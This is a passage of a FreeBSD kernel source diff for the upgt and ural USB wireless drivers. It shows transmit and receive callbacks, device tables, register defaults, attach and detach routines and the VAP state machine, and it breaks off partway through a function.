sizeof(txdesc->rates)); } else { /* data frames */ txdesc->header1.flags = UPGT_H1_FLAGS_TX_DATA; memcpy(txdesc->rates, sc->sc_cur_rateset, sizeof(txdesc->rates)); } txdesc->header1.type = UPGT_H1_TYPE_TX_DATA; txdesc->header1.len = htole16(m->m_pkthdr.len); txdesc->header2.reqid = htole32(data->addr); txdesc->header2.type = htole16(UPGT_H2_TYPE_TX_ACK_YES); txdesc->header2.flags = htole16(UPGT_H2_FLAGS_TX_ACK_YES); txdesc->type = htole32(UPGT_TX_DESC_TYPE_DATA); txdesc->pad3[0] = UPGT_TX_DESC_PAD3_SIZE; if (ieee80211_radiotap_active_vap(vap)) { struct upgt_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = 0; /* XXX where to get from? 
*/ ieee80211_radiotap_tx(vap, m); } /* copy frame below our TX descriptor header */ m_copydata(m, 0, m->m_pkthdr.len, data->buf + (sizeof(*mem) + sizeof(*txdesc))); /* calculate frame size */ len = sizeof(*mem) + sizeof(*txdesc) + m->m_pkthdr.len; /* we need to align the frame to a 4 byte boundary */ len = (len + 3) & ~3; /* calculate frame checksum */ mem->chksum = upgt_chksum_le((uint32_t *)txdesc, len - sizeof(*mem)); data->ni = ni; data->m = m; data->buflen = len; DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: TX start data sending (%d bytes)\n", __func__, len); KASSERT(len <= MCLBYTES, ("mbuf is small for saving data")); upgt_bulk_tx(sc, data); done: /* * If we don't regulary read the device statistics, the RX queue * will stall. It's strange, but it works, so we keep reading * the statistics here. *shrug* */ if (!(ifp->if_opackets % UPGT_TX_STAT_INTERVAL)) upgt_get_stats(sc); return (error); } static void upgt_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct upgt_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL; struct upgt_data *data; int8_t nf; int rssi = -1; UPGT_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = upgt_rxeof(xfer, data, &rssi); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) return; STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, MCLBYTES); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ UPGT_UNLOCK(sc); if (m != NULL) { wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = -95; /* XXX */ if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); /* node is no longer needed */ ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); m = NULL; } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) upgt_start(ifp); UPGT_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. 
*/ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } static void upgt_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct upgt_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct upgt_data *data; UPGT_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); UPGT_STAT_DEC(sc, st_tx_active); upgt_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); UPGT_STAT_INC(sc, st_tx_inactive); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); UPGT_STAT_DEC(sc, st_tx_pending); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); UPGT_STAT_INC(sc, st_tx_active); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); UPGT_UNLOCK(sc); upgt_start(ifp); UPGT_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static device_method_t upgt_methods[] = { /* Device interface */ DEVMETHOD(device_probe, upgt_match), DEVMETHOD(device_attach, upgt_attach), DEVMETHOD(device_detach, upgt_detach), DEVMETHOD_END }; static driver_t upgt_driver = { .name = "upgt", .methods = upgt_methods, .size = sizeof(struct upgt_softc) }; static devclass_t upgt_devclass; DRIVER_MODULE(if_upgt, uhub, upgt_driver, upgt_devclass, NULL, 0); MODULE_VERSION(if_upgt, 1); MODULE_DEPEND(if_upgt, usb, 1, 1, 1); MODULE_DEPEND(if_upgt, wlan, 1, 1, 1); MODULE_DEPEND(if_upgt, upgtfw_fw, 1, 1, 1); diff --git a/sys/dev/usb/wlan/if_ural.c b/sys/dev/usb/wlan/if_ural.c index 835139075ae9..cf1da4a57813 100644 --- a/sys/dev/usb/wlan/if_ural.c +++ b/sys/dev/usb/wlan/if_ural.c @@ -1,2298 +1,2298 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2005, 2006 * Damien Bergamini * * Copyright (c) 2006, 2008 * Hans Petter Selasky * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
*/ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2500USB chipset driver * http://www.ralinktech.com/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR ural_debug #include #include #include #ifdef USB_DEBUG static int ural_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, ural, CTLFLAG_RW, 0, "USB ural"); SYSCTL_INT(_hw_usb_ural, OID_AUTO, debug, CTLFLAG_RW, &ural_debug, 0, "Debug level"); #endif #define URAL_RSSI(rssi) \ ((rssi) > (RAL_NOISE_FLOOR + RAL_RSSI_CORR) ? \ ((rssi) - (RAL_NOISE_FLOOR + RAL_RSSI_CORR)) : 0) /* various supported device vendors/products */ static const STRUCT_USB_HOST_ID ural_devs[] = { #define URAL_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } URAL_DEV(ASUS, WL167G), URAL_DEV(ASUS, RT2570), URAL_DEV(BELKIN, F5D7050), URAL_DEV(BELKIN, F5D7051), URAL_DEV(CISCOLINKSYS, HU200TS), URAL_DEV(CISCOLINKSYS, WUSB54G), URAL_DEV(CISCOLINKSYS, WUSB54GP), URAL_DEV(CONCEPTRONIC2, C54RU), URAL_DEV(DLINK, DWLG122), URAL_DEV(GIGABYTE, GN54G), URAL_DEV(GIGABYTE, GNWBKG), URAL_DEV(GUILLEMOT, HWGUSB254), URAL_DEV(MELCO, KG54), URAL_DEV(MELCO, KG54AI), URAL_DEV(MELCO, KG54YB), URAL_DEV(MELCO, NINWIFI), URAL_DEV(MSI, RT2570), URAL_DEV(MSI, RT2570_2), URAL_DEV(MSI, RT2570_3), URAL_DEV(NOVATECH, NV902), URAL_DEV(RALINK, RT2570), URAL_DEV(RALINK, RT2570_2), URAL_DEV(RALINK, RT2570_3), URAL_DEV(SIEMENS2, WL54G), URAL_DEV(SMC, 2862WG), URAL_DEV(SPHAIRON, UB801R), URAL_DEV(SURECOM, RT2570), URAL_DEV(VTECH, RT2570), URAL_DEV(ZINWELL, RT2570), #undef URAL_DEV }; static usb_callback_t ural_bulk_read_callback; static usb_callback_t ural_bulk_write_callback; static usb_error_t ural_do_request(struct ural_softc *sc, struct usb_device_request *req, void *data); static struct ieee80211vap *ural_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void ural_vap_delete(struct ieee80211vap *); static void ural_tx_free(struct ural_tx_data *, int); static void ural_setup_tx_list(struct ural_softc *); static void ural_unsetup_tx_list(struct ural_softc *); static int ural_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void ural_setup_tx_desc(struct ural_softc *, struct ural_tx_desc *, uint32_t, int, int); static int ural_tx_bcn(struct ural_softc *, struct mbuf *, struct ieee80211_node *); static int ural_tx_mgt(struct ural_softc *, struct mbuf *, struct ieee80211_node *); static int ural_tx_data(struct ural_softc *, struct mbuf *, struct ieee80211_node *); static void ural_start(struct ifnet *); static int ural_ioctl(struct ifnet *, u_long, caddr_t); static void ural_set_testmode(struct ural_softc *); static void ural_eeprom_read(struct ural_softc *, uint16_t, void *, int); static uint16_t ural_read(struct ural_softc *, uint16_t); static void ural_read_multi(struct ural_softc *, uint16_t, void *, int); static void ural_write(struct ural_softc *, uint16_t, uint16_t); static void ural_write_multi(struct ural_softc *, uint16_t, void *, int) __unused; static void ural_bbp_write(struct ural_softc *, uint8_t, uint8_t); static uint8_t ural_bbp_read(struct ural_softc *, uint8_t); static void ural_rf_write(struct ural_softc 
*, uint8_t, uint32_t); static void ural_scan_start(struct ieee80211com *); static void ural_scan_end(struct ieee80211com *); static void ural_set_channel(struct ieee80211com *); static void ural_set_chan(struct ural_softc *, struct ieee80211_channel *); static void ural_disable_rf_tune(struct ural_softc *); static void ural_enable_tsf_sync(struct ural_softc *); static void ural_enable_tsf(struct ural_softc *); static void ural_update_slot(struct ifnet *); static void ural_set_txpreamble(struct ural_softc *); static void ural_set_basicrates(struct ural_softc *, const struct ieee80211_channel *); static void ural_set_bssid(struct ural_softc *, const uint8_t *); static void ural_set_macaddr(struct ural_softc *, uint8_t *); static void ural_update_promisc(struct ifnet *); static void ural_setpromisc(struct ural_softc *); static const char *ural_get_rf(int); static void ural_read_eeprom(struct ural_softc *); static int ural_bbp_init(struct ural_softc *); static void ural_set_txantenna(struct ural_softc *, int); static void ural_set_rxantenna(struct ural_softc *, int); static void ural_init_locked(struct ural_softc *); static void ural_init(void *); static void ural_stop(struct ural_softc *); static int ural_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void ural_ratectl_start(struct ural_softc *, struct ieee80211_node *); static void ural_ratectl_timeout(void *); static void ural_ratectl_task(void *, int); static int ural_pause(struct ural_softc *sc, int timeout); /* * Default values for MAC registers; values taken from the reference driver. */ static const struct { uint16_t reg; uint16_t val; } ural_def_mac[] = { { RAL_TXRX_CSR5, 0x8c8d }, { RAL_TXRX_CSR6, 0x8b8a }, { RAL_TXRX_CSR7, 0x8687 }, { RAL_TXRX_CSR8, 0x0085 }, { RAL_MAC_CSR13, 0x1111 }, { RAL_MAC_CSR14, 0x1e11 }, { RAL_TXRX_CSR21, 0xe78f }, { RAL_MAC_CSR9, 0xff1d }, { RAL_MAC_CSR11, 0x0002 }, { RAL_MAC_CSR22, 0x0053 }, { RAL_MAC_CSR15, 0x0000 }, { RAL_MAC_CSR8, RAL_FRAME_SIZE }, { RAL_TXRX_CSR19, 0x0000 }, { RAL_TXRX_CSR18, 0x005a }, { RAL_PHY_CSR2, 0x0000 }, { RAL_TXRX_CSR0, 0x1ec0 }, { RAL_PHY_CSR4, 0x000f } }; /* * Default values for BBP registers; values taken from the reference driver. */ static const struct { uint8_t reg; uint8_t val; } ural_def_bbp[] = { { 3, 0x02 }, { 4, 0x19 }, { 14, 0x1c }, { 15, 0x30 }, { 16, 0xac }, { 17, 0x48 }, { 18, 0x18 }, { 19, 0xff }, { 20, 0x1e }, { 21, 0x08 }, { 22, 0x08 }, { 23, 0x08 }, { 24, 0x80 }, { 25, 0x50 }, { 26, 0x08 }, { 27, 0x23 }, { 30, 0x10 }, { 31, 0x2b }, { 32, 0xb9 }, { 34, 0x12 }, { 35, 0x50 }, { 39, 0xc4 }, { 40, 0x02 }, { 41, 0x60 }, { 53, 0x10 }, { 54, 0x18 }, { 56, 0x08 }, { 57, 0x10 }, { 58, 0x08 }, { 61, 0x60 }, { 62, 0x10 }, { 75, 0xff } }; /* * Default values for RF register R2 indexed by channel numbers. 
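There is one entry per 2.4 GHz channel (1-14); ural_set_chan() indexes these tables with (channel - 1).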
*/ static const uint32_t ural_rf2522_r2[] = { 0x307f6, 0x307fb, 0x30800, 0x30805, 0x3080a, 0x3080f, 0x30814, 0x30819, 0x3081e, 0x30823, 0x30828, 0x3082d, 0x30832, 0x3083e }; static const uint32_t ural_rf2523_r2[] = { 0x00327, 0x00328, 0x00329, 0x0032a, 0x0032b, 0x0032c, 0x0032d, 0x0032e, 0x0032f, 0x00340, 0x00341, 0x00342, 0x00343, 0x00346 }; static const uint32_t ural_rf2524_r2[] = { 0x00327, 0x00328, 0x00329, 0x0032a, 0x0032b, 0x0032c, 0x0032d, 0x0032e, 0x0032f, 0x00340, 0x00341, 0x00342, 0x00343, 0x00346 }; static const uint32_t ural_rf2525_r2[] = { 0x20327, 0x20328, 0x20329, 0x2032a, 0x2032b, 0x2032c, 0x2032d, 0x2032e, 0x2032f, 0x20340, 0x20341, 0x20342, 0x20343, 0x20346 }; static const uint32_t ural_rf2525_hi_r2[] = { 0x2032f, 0x20340, 0x20341, 0x20342, 0x20343, 0x20344, 0x20345, 0x20346, 0x20347, 0x20348, 0x20349, 0x2034a, 0x2034b, 0x2034e }; static const uint32_t ural_rf2525e_r2[] = { 0x2044d, 0x2044e, 0x2044f, 0x20460, 0x20461, 0x20462, 0x20463, 0x20464, 0x20465, 0x20466, 0x20467, 0x20468, 0x20469, 0x2046b }; static const uint32_t ural_rf2526_hi_r2[] = { 0x0022a, 0x0022b, 0x0022b, 0x0022c, 0x0022c, 0x0022d, 0x0022d, 0x0022e, 0x0022e, 0x0022f, 0x0022d, 0x00240, 0x00240, 0x00241 }; static const uint32_t ural_rf2526_r2[] = { 0x00226, 0x00227, 0x00227, 0x00228, 0x00228, 0x00229, 0x00229, 0x0022a, 0x0022a, 0x0022b, 0x0022b, 0x0022c, 0x0022c, 0x0022d }; /* * For dual-band RF, RF registers R1 and R4 also depend on channel number; * values taken from the reference driver. */ static const struct { uint8_t chan; uint32_t r1; uint32_t r2; uint32_t r4; } ural_rf5222[] = { { 1, 0x08808, 0x0044d, 0x00282 }, { 2, 0x08808, 0x0044e, 0x00282 }, { 3, 0x08808, 0x0044f, 0x00282 }, { 4, 0x08808, 0x00460, 0x00282 }, { 5, 0x08808, 0x00461, 0x00282 }, { 6, 0x08808, 0x00462, 0x00282 }, { 7, 0x08808, 0x00463, 0x00282 }, { 8, 0x08808, 0x00464, 0x00282 }, { 9, 0x08808, 0x00465, 0x00282 }, { 10, 0x08808, 0x00466, 0x00282 }, { 11, 0x08808, 0x00467, 0x00282 }, { 12, 0x08808, 0x00468, 0x00282 }, { 13, 0x08808, 0x00469, 0x00282 }, { 14, 0x08808, 0x0046b, 0x00286 }, { 36, 0x08804, 0x06225, 0x00287 }, { 40, 0x08804, 0x06226, 0x00287 }, { 44, 0x08804, 0x06227, 0x00287 }, { 48, 0x08804, 0x06228, 0x00287 }, { 52, 0x08804, 0x06229, 0x00287 }, { 56, 0x08804, 0x0622a, 0x00287 }, { 60, 0x08804, 0x0622b, 0x00287 }, { 64, 0x08804, 0x0622c, 0x00287 }, { 100, 0x08804, 0x02200, 0x00283 }, { 104, 0x08804, 0x02201, 0x00283 }, { 108, 0x08804, 0x02202, 0x00283 }, { 112, 0x08804, 0x02203, 0x00283 }, { 116, 0x08804, 0x02204, 0x00283 }, { 120, 0x08804, 0x02205, 0x00283 }, { 124, 0x08804, 0x02206, 0x00283 }, { 128, 0x08804, 0x02207, 0x00283 }, { 132, 0x08804, 0x02208, 0x00283 }, { 136, 0x08804, 0x02209, 0x00283 }, { 140, 0x08804, 0x0220a, 0x00283 }, { 149, 0x08808, 0x02429, 0x00281 }, { 153, 0x08808, 0x0242b, 0x00281 }, { 157, 0x08808, 0x0242d, 0x00281 }, { 161, 0x08808, 0x0242f, 0x00281 } }; static const struct usb_config ural_config[URAL_N_TRANSFER] = { [URAL_BULK_WR] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = (RAL_FRAME_SIZE + RAL_TX_DESC_SIZE + 4), .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = ural_bulk_write_callback, .timeout = 5000, /* ms */ }, [URAL_BULK_RD] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = (RAL_FRAME_SIZE + RAL_RX_DESC_SIZE), .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = ural_bulk_read_callback, }, }; static device_probe_t ural_match; static device_attach_t ural_attach; static device_detach_t ural_detach; static 
device_method_t ural_methods[] = { /* Device interface */ DEVMETHOD(device_probe, ural_match), DEVMETHOD(device_attach, ural_attach), DEVMETHOD(device_detach, ural_detach), DEVMETHOD_END }; static driver_t ural_driver = { .name = "ural", .methods = ural_methods, .size = sizeof(struct ural_softc), }; static devclass_t ural_devclass; DRIVER_MODULE(ural, uhub, ural_driver, ural_devclass, NULL, 0); MODULE_DEPEND(ural, usb, 1, 1, 1); MODULE_DEPEND(ural, wlan, 1, 1, 1); MODULE_VERSION(ural, 1); static int ural_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != 0) return (ENXIO); if (uaa->info.bIfaceIndex != RAL_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(ural_devs, sizeof(ural_devs), uaa)); } static int ural_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct ural_softc *sc = device_get_softc(self); struct ifnet *ifp; struct ieee80211com *ic; uint8_t iface_index, bands; int error; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); iface_index = RAL_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, ural_config, URAL_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } RAL_LOCK(sc); /* retrieve RT2570 rev. no */ sc->asic_rev = ural_read(sc, RAL_MAC_CSR0); /* retrieve MAC address and various other things from EEPROM */ ural_read_eeprom(sc); RAL_UNLOCK(sc); device_printf(self, "MAC/BBP RT2570 (rev 0x%02x), RF %s\n", sc->asic_rev, ural_get_rf(sc->rf_rev)); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "ural", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = ural_init; ifp->if_ioctl = ural_ioctl; ifp->if_start = ural_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_HOSTAP /* HostAp mode supported */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* bg scanning supported */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RAL_RF_5222) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_update_promisc = ural_update_promisc; ic->ic_raw_xmit = ural_raw_xmit; ic->ic_scan_start = ural_scan_start; ic->ic_scan_end = ural_scan_end; ic->ic_set_channel = ural_set_channel; ic->ic_vap_create = ural_vap_create; ic->ic_vap_delete = ural_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RAL_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RAL_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: ural_detach(self); return (ENXIO); /* failure */ } 
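/*
 * The functional change in this file is the rename of the frame-control
 * flag that gates software crypto encapsulation (IEEE80211_FC1_WEP ->
 * IEEE80211_FC1_PROTECTED).  Each transmit path below follows the same
 * pattern: test the Protected Frame bit, hand the mbuf to net80211 for
 * encapsulation, then refetch the header pointer because
 * ieee80211_crypto_encap() may prepend an IV and move the mbuf data.
 * The sketch below condenses that pattern for reference; it is illustrative
 * only and not part of the driver (the helper name is made up), so it is
 * kept under #if 0.
 */
#if 0
static int
example_encap_if_protected(struct ieee80211_node *ni, struct mbuf *m)
{
	struct ieee80211_frame *wh = mtod(m, struct ieee80211_frame *);
	struct ieee80211_key *k;

	if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) {
		k = ieee80211_crypto_encap(ni, m);
		if (k == NULL) {
			/* no key or encapsulation failed: drop the frame */
			m_freem(m);
			return (ENOBUFS);
		}
		/* packet header may have moved, reset our local pointer */
		wh = mtod(m, struct ieee80211_frame *);
	}
	/* callers go on to use wh, e.g. to test i_addr1 and set i_dur */
	return (0);
}
#endif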
static int ural_detach(device_t self) { struct ural_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; /* prevent further ioctls */ RAL_LOCK(sc); sc->sc_detached = 1; RAL_UNLOCK(sc); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, URAL_N_TRANSFER); /* free TX list, if any */ RAL_LOCK(sc); ural_unsetup_tx_list(sc); RAL_UNLOCK(sc); if (ifp) { ic = ifp->if_l2com; ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static usb_error_t ural_do_request(struct ural_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); if (ural_pause(sc, hz / 100)) break; } return (err); } static struct ieee80211vap * ural_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ural_softc *sc = ic->ic_ifp->if_softc; struct ural_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; uvp = (struct ural_vap *) malloc(sizeof(struct ural_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return NULL; vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = ural_newstate; usb_callout_init_mtx(&uvp->ratectl_ch, &sc->sc_mtx, 0); TASK_INIT(&uvp->ratectl_task, 0, ural_ratectl_task, uvp); ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void ural_vap_delete(struct ieee80211vap *vap) { struct ural_vap *uvp = URAL_VAP(vap); struct ieee80211com *ic = vap->iv_ic; usb_callout_drain(&uvp->ratectl_ch); ieee80211_draintask(ic, &uvp->ratectl_task); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void ural_tx_free(struct ural_tx_data *data, int txerr) { struct ural_softc *sc = data->sc; if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? 
ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; } STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } static void ural_setup_tx_list(struct ural_softc *sc) { struct ural_tx_data *data; int i; sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); for (i = 0; i < RAL_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; data->sc = sc; STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } } static void ural_unsetup_tx_list(struct ural_softc *sc) { struct ural_tx_data *data; int i; /* make sure any subsequent use of the queues will fail */ sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); /* free up all node references and mbufs */ for (i = 0; i < RAL_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int ural_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ural_vap *uvp = URAL_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct ural_softc *sc = ic->ic_ifp->if_softc; const struct ieee80211_txparam *tp; struct ieee80211_node *ni; struct mbuf *m; DPRINTF("%s -> %s\n", ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); RAL_LOCK(sc); usb_callout_stop(&uvp->ratectl_ch); switch (nstate) { case IEEE80211_S_INIT: if (vap->iv_state == IEEE80211_S_RUN) { /* abort TSF synchronization */ ural_write(sc, RAL_TXRX_CSR19, 0); /* force tx led to stop blinking */ ural_write(sc, RAL_MAC_CSR20, 0); } break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); if (vap->iv_opmode != IEEE80211_M_MONITOR) { if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { RAL_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } ural_update_slot(ic->ic_ifp); ural_set_txpreamble(sc); ural_set_basicrates(sc, ic->ic_bsschan); IEEE80211_ADDR_COPY(sc->sc_bssid, ni->ni_bssid); ural_set_bssid(sc, sc->sc_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS) { m = ieee80211_beacon_alloc(ni, &uvp->bo); if (m == NULL) { device_printf(sc->sc_dev, "could not allocate beacon\n"); RAL_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } ieee80211_ref_node(ni); if (ural_tx_bcn(sc, m, ni) != 0) { device_printf(sc->sc_dev, "could not send beacon\n"); RAL_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } } /* make tx led blink on tx (controlled by ASIC) */ ural_write(sc, RAL_MAC_CSR20, 1); if (vap->iv_opmode != IEEE80211_M_MONITOR) ural_enable_tsf_sync(sc); else ural_enable_tsf(sc); /* enable automatic rate adaptation */ /* XXX should use ic_bsschan but not valid until after newstate call below */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) ural_ratectl_start(sc, ni); ieee80211_free_node(ni); break; default: break; } RAL_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static void ural_bulk_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct ural_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct 